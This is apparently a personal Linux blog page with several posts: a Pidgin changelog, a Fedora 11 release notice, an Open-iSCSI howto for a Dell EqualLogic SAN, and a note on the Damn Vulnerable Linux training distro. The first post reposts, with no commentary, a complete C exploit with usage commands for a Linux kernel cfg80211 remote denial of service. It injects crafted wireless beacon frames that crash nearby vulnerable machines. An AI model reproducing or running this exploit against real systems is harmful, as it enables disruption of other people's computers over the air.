Xanda's Blog !~!

Linux Kernel < 2.6.30.5 cfg80211 Remote DoS

Aug
18

In case you guys haven’t notice about this vulnerability

/*
 * cfg80211-remote-dos.c
 *
 * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://patchwork.kernel.org/patch/41218/
 *
 *   These pointers can be NULL, the is_mesh() case isn't ever hit in the 
 *   current kernel, but cmp_ies() can be hit under certain conditions.
 *
 * Usage:
 *
 *   $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
 *   $ airmon-ng start wlan0
 *   ...
 *   $ ./cfg80211-remote-dos mon0 mac80211
 *   [+] Initializing interface mon0...
 *   [+] Injecting crafted DoS beacon frames...
 *
 * Notes:
 *
 *   The NULL pointer dereference is triggered if the victim scans and receives
 *   a beacon frame that does not contain a SSID IE and then receives another 
 *   one that does have a SSID IE.  Raw frame injection via LORCON is required 
 *   on the wireless interface.  This should only affect the 2.6.30 series.
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
 
#include <tx80211.h>
#include <tx80211_packet.h>
 
#define BEACON_NOSSID \
	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x30\x4b" \
	"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
	"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
	"\x03\x01\x07" \
	"\x05\x04\x00\x01\x01\x00" \
	"\x2a\x01\x04" \
	"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
 
#define BEACON_SSID \
	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x30\x4b" \
	"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
	"\x00\x03\x44\x6f\x53" \
	"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
	"\x03\x01\x07" \
	"\x05\x04\x00\x01\x01\x00" \
	"\x2a\x01\x04" \
	"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
 
void
usage(char **argv)
{
	int i;
	struct tx80211_cardlist *cardlist;
 
	printf("Usage: %s [interface] [drivername]\n", argv[0]);
 
	cardlist = tx80211_getcardlist();
 
	if (cardlist == NULL) {
		printf("Error accessing supported cardlist.\n");
	} else {
		printf("\nSupported drivers are: ");
		for (i = 1; i < cardlist->num_cards; i++) {
			printf("%s ", cardlist->cardnames[i]);
		}
		printf("\n");
	}
	tx80211_freecardlist(cardlist);
}
 
int
main(int argc, char **argv)
{
	struct tx80211 tx;
	struct tx80211_packet pkt;
	char p1[BEACON_NOSSID_LEN];
	char p2[BEACON_SSID_LEN];
	int ret, drivertype;
	uint8_t randbyte;
 
	if (argc < 3) {
		usage(argv);
		return 0;
	}
 
	printf("[+] Initializing interface %s...\n", argv[1]);
 
	drivertype = tx80211_resolvecard(argv[2]);
	if (drivertype == INJ_NODRIVER) {
		printf("[-] Driver name not recognized.\n");
		exit(1);
	}
 
	ret = tx80211_init(&tx, argv[1], drivertype);
	if (ret < 0) {
		printf("[-] Error initializing %s/%s", argv[1], argv[2]);
		exit(1);
	}
 
	ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
	if (ret != 0) {
		printf("[-] Error setting monitor mode.\n");
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	ret = tx80211_setchannel(&tx, 11);
	if (ret < 0) {
		printf("[-] Error setting channel.\n");
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	ret = tx80211_open(&tx);
	if (ret < 0) {
		printf("[-] Unable to open interface %s\n", tx.ifname);
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	srand(time(NULL));
 
	memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
	memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
 
	printf("[+] Injecting crafted DoS beacon frames...\n");
 
	while (1) {
		randbyte = rand() & 0xff;
		p1[15] = randbyte;
		p1[21] = randbyte;
		p2[15] = randbyte;
		p2[21] = randbyte;
 
		pkt.packet = p1;
		pkt.plen = BEACON_NOSSID_LEN;
		if (tx80211_txpacket(&tx, &pkt) < 0) {
			printf("[-] Unable to transmit packet.\n");
			printf("[-] %s.\n", tx80211_geterrstr(&tx));
			exit(1);
		}
 
		pkt.packet = p2;
		pkt.plen = BEACON_SSID_LEN;
		if (tx80211_txpacket(&tx, &pkt) < 0) {
			printf("[-] Unable to transmit packet.\n");
			printf("[-] %s.\n", tx80211_geterrstr(&tx));
			exit(1);
		}
	}
 
	tx80211_close(&tx);
 
	return 0;
}

Source: Milw0rm

Pidgin 2.5.7 Has Released

Jun
24

Download

[If you plan to compile it yourself, please refer HERE]

Change log:

  • Yahoo Protocol 16 support, including new HTTPS login method; this should fix a number of login problems that have recently cropped up. (Sulabh Mahajan, Mike “Maiku” Ruprecht)
  • Only display the AIM “Unable to Retrieve Buddy List” message once per connection. (Rob Taft)
  • Blocking MSN users not on your buddy list no longer disconnects you.
  • When performing operations on MSN, assume users are on the MSN/Passport network if we don’t get network ID’s for them.

Fedora 11 (Reign) has Released

Jun
10

Release Note

Screenshot Tour

Download

P/S: WordPress 2.8 will be released soon as well. Stay tuned..

Dell EqualLogic PS Series iSCSI SAN Arrays – Storage Area Network

Apr
28

This is not the first time I deal with SAN device but I never use it with Ubuntu Linux before. Anyway, there is first time for everything.

After 15 minutes playing around with Open-iSCSI (it can be done in just a few seconds in Windows by using GUI based iSCSI Initiator), here is the howto (and at the same time as a note for myself)

1) Install Open-iSCSI Initiator

sudo apt-get install open-iscsi

2) If you want your computer manually connect to the SAN volume, proceed with step 3. But if you want your computer automatically connect to the volume, edit the iscsid configurtation file

sudo nano /etc/iscsi/iscsid.conf

And change the following parameters

  • isns.address = SAN-IP-ADDRESS-HERE
  • isns.port = 3260

3) If the restriction is based on IP (without password) procees with step 4. But if password is required, edit the iscsid configurtation file

sudo nano /etc/iscsi/iscsid.conf

And change/set the following parameters

  • node.session.auth.username = USER
  • node.session.auth.password = PASSWORD
  • discovery.sendtargets.auth.username = USER
  • discovery.sendtargets.auth.password = PASSWORD

4) Restart the open-iscsi service

sudo /etc/init.d/open-iscsi restart

5) Run open-iscsi administration utility with root privilege to discover available volume

sudo iscsiadm -m discovery -t sendtargets -p 192.168.10.1

where 192.168.10.1 is the IP of your SAN. If your configuration is working, you will get something similar to this :-

192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-f260b4603-e8b0000001249f55-vss-control
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-6980b4603-a990000001f49f56-csmvol3
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-58c0b4603-1730000001c49f56-csmvol2
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1

6) In this case, I want to connect to volume 1 (iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1), so here is what I should do

sudo iscsiadm --mode node --targetname iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1 --portal 192.168.10.1:3260 --login

And if you are successfully connected, you’ll get the following message

Logging in to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]
Login to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]: successful

7) Now, verify the device name that has been connected to your machine

tail -f /var/log/messages

And in my case, this is my output

Apr 28 09:42:48 xps kernel: [ 2514.014658] scsi 6:0:0:0: Direct-Access     EQLOGIC  100E-00          4.0  PQ: 0 ANSI: 5
Apr 28 09:42:48 xps kernel: [ 2514.016499] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.017832] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.018256] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019240] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.019434] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.019836] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019842]  sdb: sdb1
Apr 28 09:42:48 xps kernel: [ 2514.024882] sd 6:0:0:0: [sdb] Attached SCSI disk
Apr 28 09:42:48 xps kernel: [ 2514.026039] sd 6:0:0:0: Attached scsi generic sg2 type 0

The connected volume appear to be as SDB in my machine

8 ) If the volume already contain partition and already formated, you can straight away mount them, but if they dont have partition and filesystem yet, you can either use fdisk or gparted to create the partition and format them 😉

Enjoy..!~

Demo for fdisk -l output

Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x12961295
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1               1          12       96358+  de  Dell Utility
/dev/sda2   *          13        7661    61440592+   7  HPFS/NTFS
/dev/sda3            7662       11396    30001387+   b  W95 FAT32
/dev/sda4           11397       19457    64749982+   5  Extended
/dev/sda5           11397       11520      995998+  82  Linux swap / Solaris
/dev/sda6           11521       19457    63753921   83  Linux
 
Disk /dev/sdb: 107.3 GB, 107379425280 bytes
255 heads, 63 sectors/track, 13054 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00093e08
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1       13054   104856223+  83  Linux

[Reference: Cyberciti & Ubuntu Forum]

Damn Vulnerable Linux (DVL)

Mar
10

Damn Vulnerable Linux (DVL) is a Slackware and Slax-based live DVD purposefully stuffed with broken, ill-configured, outdated and exploitable software, began life as a training system used during the author’s university lectures.

Its primary goal is to design a Linux system that is as vulnerable as possible — in order to teach and demonstrate a variety of security topics, including reverse code engineering, buffer overflows, shell code development, web exploitation, and SQL injection.

It contains older, easily breakable versions of Apache, MySQL, PHP, and FTP and SSH daemons, as well as several tools available to help you compile, debug, and break applications running on these services, including GCC, GDB, NASM, strace, ELF Shell, DDD, LDasm, LIDa, and more.

So if you are looking for a new playground, DVL is a good choice for you.